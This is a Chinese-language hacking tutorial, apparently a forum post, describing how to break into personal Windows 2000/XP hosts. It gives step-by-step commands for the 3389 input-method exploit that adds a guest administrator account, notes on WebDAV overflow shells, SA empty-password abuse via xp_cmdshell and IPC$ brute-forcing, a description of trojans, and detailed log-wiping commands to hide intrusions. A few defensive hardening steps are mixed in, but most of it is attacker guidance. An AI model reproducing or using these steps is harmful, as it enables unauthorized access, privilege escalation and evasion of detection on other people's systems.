入侵个人主机网络的步骤
第一步:隐藏自已的位置
为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽 量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指,HACK实现通过后门程序控制 的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是 “肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机
攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地 址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地 找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统 类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,以试 图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以 及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机
攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进 行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻 觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的 一种技法。
第四步:获得控制权
攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事 :清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程 操纵程序,以便日后可以不被觉察地再次进入系统。此外,为了避免目标主机发现,清除日 志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权
攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;窃取帐号密码、 个人资料等。
三、网络攻击的原理和手法
1、从扫描开始
扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。 常见的扫描工具有X-scan、superscan、流光、X-port等。
在这些工具中,国产的X-scan与流光可算的上是两个“利器”,这两个工具不但具有相当快 的扫描速度和精确度(个人感觉X-scan在扫描速度上可能更快一点),同时还是发起攻击的 第一手选择,当然在攻击方面,流光更为强悍些。
除了常见个WWW(80)、FTP(21)、TELNET(23)等,查查十大高风险事件,我们就知道, 攻击者通常还对下列端口很感兴趣:
135:MS RPC,可以产生针对Windows 2000/XP RPC服务远程拒绝服务攻击,以及RPC溢出漏 洞,著名的“冲击波”“震荡波”就是利用DCOM RPC感染设备;
137~139:NetBIOS,WINDOWS系统通过这个端口提供文件和打印共享;
445:Microsoft-ds,非常重要的端口,LSASS漏洞、RPC定位漏洞都在这里出现;
1433:Microsoft SQL,后面会提到,SQL SERVER默认安装时留下的空口令SA用户可以让攻 击者为所欲为;
5632:PCANYWERE,一种远程终端控制软件;
3389:WINDOWS远程终端服务
4899:RADMIN,一种远程终端控制软件
由此可见,没有扫描,自然也就没有攻击,从安全的角度的来说,个人主机最安全的系统应 该算是WINDOWS98,由于WINDOWS98几乎不开启任何服务,自然也没有任何开放端口,没有端 口,对于这类系统攻击的可能性就大大降低。当然,XP在打了SP2的补丁后,等于有了一个 基于状态的个人防火墙,相对安全性也提高了很多。
2、攻击开始
扫描到有开放的端口,下一步自然是针对相关端口发起攻击,针对不同端口常见攻击方式有 :
139/445:“永恒”的IPC$(未发现此漏洞)
说是“永恒”,主要是因为这种漏洞基本已经只能存在于记忆中了。
什么是IPC,IPC是共享“命名管道”的资源,主要用于程序间的通讯。在远程管理计算机和 查看计算机的共享资源时使用。什么是“空连接”,利用默认的IPC我们可以与目标主机建 立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得目标主机上的 用户列表。
得到用户列表有什么用?我们可以利用IPC,访问共享资源,导出用户列表,并使用一些字 典工具,进行密码探测。得到了用户权限后,我们可以利用IPC共享访问用户的资源。但所 谓的ipc漏洞ipc漏洞,其实并不是真正意义上的漏洞,WINDOWS设计初衷是为了方便管理员 的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c,d,e ……)和系统目录winnt或windows(admin)。所有的这些,初衷都是为了方便管理员的管理, 但好的初衷并不一定有好的收效,曾经在一段时间,IPC$已经成为了一种最流行的入侵方式 。
IPC$需要在NT/2000/XP下运行,通常如果扫描出目标开放了139或445端口,往往是目标开启 IPC$的前兆,但如果目的主机关闭了IPC $连接共享,你依然无法建立连接,同样如果管理 员设置禁止导出用户列表,你就算建立IPC$连接也无法看到对方的用户列表。另外提醒一下 ,WINXP系统中,已经禁止了远程用户的访问权限,因此,如果对方是XP的操作系统,就别 费这个劲了。
如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现 问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等)
5设置复杂密码,防止通过ipc$穷举密码
除了IPC$,我们还可以利用例如SMBCRACK通过暴力猜解管理员口令,如果对方未打补丁,我 们还可以利用各种RPC漏洞(就是冲击波、震荡波用的那些漏洞),通过各种溢出程序, 来得到权限提升(原理和病毒感染的原理是一样的)。
21:Serv-u入侵(未测试使用)
Serv-u是常用的FTP SERVER端软件的一种,因为常用,所以被研究出的漏洞也不少,如果对 端开放了21端口,并且采用Seru-U来架站的话,可以查看一下对端的版本。对5. 004及以下 系统,可用溢出入侵。(serv5004.exe)对5.1.0.0及以下系统,有一个本地提升权限的漏 洞。(servlocal.exe)
Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户 的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、 本地系统上以FTP系统管理员权限来执行任意命令。
80:曾经的神话“WEBDAV”(使用情况,成功溢出4台主机,并登陆其中一台,其他3台的 IIS重启)
微软的IIS功能强大,但遗憾的是同样漏洞多多,如果IIS不打补丁到SP3的话,那么就有一 个著名的WEBDAV漏洞。
Webdav漏洞说明:
Microsoft Windows 2000 支持“万维网分布式创作和版本控制 (WebDAV)”协议。RFC 2518 中定义的 WebDAV 是超文本传输协议 (HTTP) 的一组扩展,为 Internet 上计算aIIS 服务 (默认情况下在 LocalSystem 上下文中运行)的安全上下文中运行。 尽管 Microsoft 已 为此弱点提供了修补程序并建议客户立即安装该修补程序,但还是提供了其他的工具和预防 措施,客户在评估该修补程序的影响和兼容性时可以使用这些工具和措施来阻止此弱点被利 用。
可以使用扫描器:Webdavscan(是一个专门用于检测IIS 5.0 服务器是否提供了对WebDAV的 支持的扫描器)来查找网络中存在WEBDAV漏洞的主机,并用溢出程序:wdx.exe来进行攻击 当溢出成功后,就可以使用telnet或者是nc等连接到目标主机的7788端口。
如:telnet 127.0.0.1 7788
如果正常的话,将出现以下提示:
Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32>
OK!
如何防御:
1. 搜索注册表中的如下键:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
增加如下注册表键值:
value name: DisableWebDAV
Data type: DWORD
value data: 1
2. 使用MS提供的专用补丁!
1433:Microsoft SQL的SA空口令(扫描到4台,成功登陆其中3台)
微软的MSSQL7.0以下的版本在默认安装时其SA(System Administrator)口令为空,所开端口 为1433,这个漏洞很早了,但直到现在我们依然可以扫描到很多空口令的SA。更为“搞笑” 的是,微软为了能够让SQL管理员管理方便,还设计了一个xp_cmdshell来执行各种相关命令 。一个入侵者只需要使用一个MS SQL客户端与SA口令为空的服务器连接就可以获得System的 权限,并可以在目标主机上执行任意命令。
攻击方式,利用“流光”或其他扫描工具可以扫描、破解SA口令,破解成功后可以使用SQL 客户端(如SQLEXEC)连接,并获得系统权限。
解决办法:
更改SA管理用户口令;
删除XP_CMDSHELL命令。(但并不保险,因为如果拥有SA权限,还是可能恢复该命令的)
3389:3389输入法漏洞(不太可能存在了,但可以猜解管理员用户口令)
Microsoft Windows 2000 Server及以上版本在安装服务器时,其中有一项是超级终端服务 ,该服务可以使用户通过图形界面象管理本地计算机一样控制远程计算机(因此成为众多攻 击者的最爱)。该服务所开放的端口号为3389,是微软为了方便用户远程管理而设。但是中 文Windows 2000存在有输入漏洞,其漏洞就是用户在登录Windows 2000时,利用输入法的帮 助文件可以获得Administrators组权限。
1、用终端客户端程序进行连接;
2、按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰, 就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
3、在\"选项\"菜单上点右键--->跳转到URL\",输入:c:\\winnt\\system32\\cmd.exe.( 如果不能确定NT系统目录,则输入:c:\\ 或d:\\ ……进行查找确定);
4、选择\"保存到磁盘\" 选择目录:c:\\inetpub\\s\\,因实际上是对方服务器上文件自身 的复制操作,所以这个过程很快就会完成;
5、打开IE,输入:http://ip/s/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就 完成了第一步;
6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat
7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat
8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add
guest>>go.bat
9、http://ip/s/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
10、在\"选项\"菜单上点右键--->跳转到URL\",输入:c:\\inetpub\\s\\go.bat --->在磁 盘当前位置执行;
11、OK,.这样我们就激活了服务器的geust帐户,密码为:elise,超级用户!
注意事项:
当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但 如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映 象,你的ip及机器名,并能发消息给你!
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动 telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧 :-)
这个漏洞在WIN2000 SP1中已经修改,因此,实际网络中存在此漏洞的机器几乎没有,但是 ,据说紫光2.3版本、超级五笔的输入法中又发现此漏洞。
解决方法
1.打补丁;
2.删掉相关输入法,用标准就可以;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32 [url=file://\\termsrv.exe]\\termsrv.exe[/url];
如果对方已经修改了输入法漏洞,那么只能通过猜解目标管理员口令的方法来尝试远程登陆 。
5632/4899:PCANYWERE和RADMIN
这是两种远程控制软件,使用方式与远程终端访问类似,都支持图形化界面对远程计算机进 行管理,设计的初衷是为了让管理员能够更方便的管理设备,但这些软件,特别是RADMIN, 可以设置其在安装时,不出现任何提示,这种方式使RADMIN更多的被做为一种木马使用。攻 击者会注意扫描这些端口,因为一旦破解了相应口令就可以象操作本地计算机一样控制目标 。
23:猜解ADSL MODEM口令
很多时候,扫描只能得到一个23端口,不要沮丧,因为对于个人主机而言,这往往是因为目 标主机采用了一个ADSL MODEM上网。一般用户在使用ADSL MODEM时,往往未加设置,这时, 攻击者往往可以利用ADSL MODEM的默认口令,登陆ADSL,一旦登陆成功,就有可能窃取ADSL 帐户和口令,并可以查看到内网的IP地址设置,并通过配置NAT映射将内网PC的相关端口映 射到公网上,然后对其进行各种破解、攻击。
特洛伊木马
扫描端口、通过各种方法获得目标主机的用户权限之后,攻击者往往利用得到的权限上传执 行一个“木马”程序,以便能够更方便的控制目标主机。
特洛伊木马是一种或是直接由一个黑客,或是通过一个不令人起疑的用户秘密安装到目标系 统的程序。一旦安装成功并取得管理员权限,安装此程序的人就可以直接远程控制目标系统 。实际上,对于各种个人主机,在未开放端口和打全补丁后,最有效的攻击方式还是“木马 ”程序。攻击者往往利用捆绑方式将木马程序与一个普通的EXE文件、JPG或其他正常文件绑 定在一起,并利用“社会工程学”的方式,欺骗对方执行程序、查看图片等。在对方执行程 序、打开图片后,木马程序就悄无声息在用户的PC上执行,并将用户的一些相关信息通过 EMAIL或其他方式发送给攻击者,而攻击者则可以通过木马程序实施对用户电脑的控制,比 如控制文件、注册表、键盘记录甚至控制屏幕等。
在早期,木马程序程序隐藏的并不深,通过查看任务管理器就会发现系统内存在不明程序在 运行,并且木马程序还会在用户主机上监听特定端口(如冰河的7626),等待攻击者的连接 。典型的早期木马如BO、BO2000、SUBSERVEN、国产的经典木马“冰河”等……这种方式的 木马容易被发现,而且被攻击目标也必须连接在公网上,因为客户端是无法透过NAT、防火 墙连接到内网的用户的。
反弹端口类型木马,“广外女生”木马是国内出现最早反弹端口类型的木马,这个木马与传 统的木马不同,它在执行后会主动连接外网的攻击者的相关端口,这种方法就避免了传统木 马无法控制内部用户的弊端(因为防火墙一般不会对内部发出的数据做控制)。此外,“广 外女生”还会自动杀掉相关杀毒程序的进程。
传统木马在执行后会作为一个进程,用户可以通过杀掉进程的方法关闭,而现在的木马则会 将自己注册一个系统服务,在系统启动后自动运行。甚至会通过DLL注入,将自己隐藏在系 统服务身后。这样用户查看进程的时候既看不到可疑进程,也看不到特殊服务……典型代表 “灰鸽子”“武汉男生”。
ASP木马,典型代表“海阳顶端网木马”。随着ASP 技术的发展,网络上基于ASP技术开发的 网站越来越多,对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。但 是基于ASP技术的木马后门,也越来越多,而且功能也越来越强大。ASP程序本身是很多网站 提供一些互动和数据处理的程序,ASP木马则是利用ASP语言编制的脚本嵌入在网页上,当用 户浏览这些网页时会自动执行相关ASP脚本,被木马感染,这种方式更加简单和隐蔽,需要 注意的是,ASP木马往往是依靠IE浏览器的一些漏洞来执行的,因此给IE打补丁是防范ASP木 马的方法之一(当然并非万能,还有一些木马会利用IE的未知漏洞传播)。
清除日志
攻击者在取得用户权限后,为了避免被发现,就要考虑清除用户主机的相关日志,因为日志 系统往往会记录攻击者的相关攻击过程和信息。
Windows2000的日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP 日志、WWW日志等等,可能会根据服务器所开启的服务不同。
一般步骤如下:
1.清除IIS的日志。
可不要小看IIS的日志功能,它可以详细的记录下你的入侵全过程,如你用unicode入侵 时ie里打的命令,和对80端口扫描时留下的痕迹。
1. 日志的默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志 。那我们就切换到这个目录下吧,然后 del *.*。但由于w3svc服务还开着,日志依然还在 。
方法一: 如有3389可以登录,那就用notepad打开,按Ctrl+A 然后del吧。
方法二: net 命令
C:\>net stop w3svc
World Wide Web Publishing Service 服务正在停止。(可能会等很长的时间,也可能 不成功)
World Wide Web Publishing Service 服务已成功停止。
选择先让w3svc停止,再清除日志,不要忘了再重新打开w3svc服务。
C:\>net start w3svc
2. 清除ftp日志
FTP日志默认位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日 志,清除方法同上。
3. 清除Scheduler日志
Scheduler服务日志默认位置:%systemroot%\schedlgu.txt。清除方法同上。
4. 应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%\sys tem32\config 。清除方法同上。
注意以上三个目录可能不在上面的位置,那是因为管理员做了修改。可以读取注册表值 得到他们的位置:
应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的
HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog
Schedluler服务日志在注册表中的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
5.清除安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它!
D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog
这项服务无法接受请求的 "暂停" 或 "停止" 操作。没办法,它是关键服务。如果不用 第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!打开“控制面板”的“ 管理工具”中的“事件查看器”,在菜单的“操作”项有一个名为“连接到另一台计算机” 的菜单,点击它然后输入远程计算机的IP,然后选择远程计算机的安全性日志,右键选择它 的属性,点击属性里的“清除日志”按钮,同样的方法去清除系统日志!
6.上面大部分重要的日志你都已经清除了。然后要做的就是以防万一还有遗漏的了。
del以下的一些文件:
\winnt\*.log
system32下
\logfiles\*.*
\dtclog\*.*
\config\*.evt
\*.log
\*.txt
